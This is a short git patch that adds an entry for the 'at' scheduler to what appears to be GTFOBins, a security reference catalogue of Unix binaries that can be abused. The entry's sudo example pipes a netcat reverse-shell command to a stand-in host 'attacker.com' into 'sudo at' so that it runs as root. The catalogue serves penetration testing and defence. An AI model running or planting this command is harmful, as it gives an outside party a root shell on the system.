From e241cd3aa7aba9df932a8a6570d6901dc1e6a6ea Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sun, 10 Jan 2021 22:15:01 +0530 Subject: [PATCH] added at --- _gtfobins/at.md | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 _gtfobins/at.md diff --git a/_gtfobins/at.md b/_gtfobins/at.md new file mode 100644 index 0000000..43342ed --- /dev/null +++ b/_gtfobins/at.md @@ -0,0 +1,8 @@ +--- +description: | + at is a command-line utility that allows you to schedule commands to be executed at a particular time. +functions: + sudo: + - code: | + echo "nc attacker.com 12345 -e /bin/bash" | sudo at now +1 minutes +--- \ No newline at end of file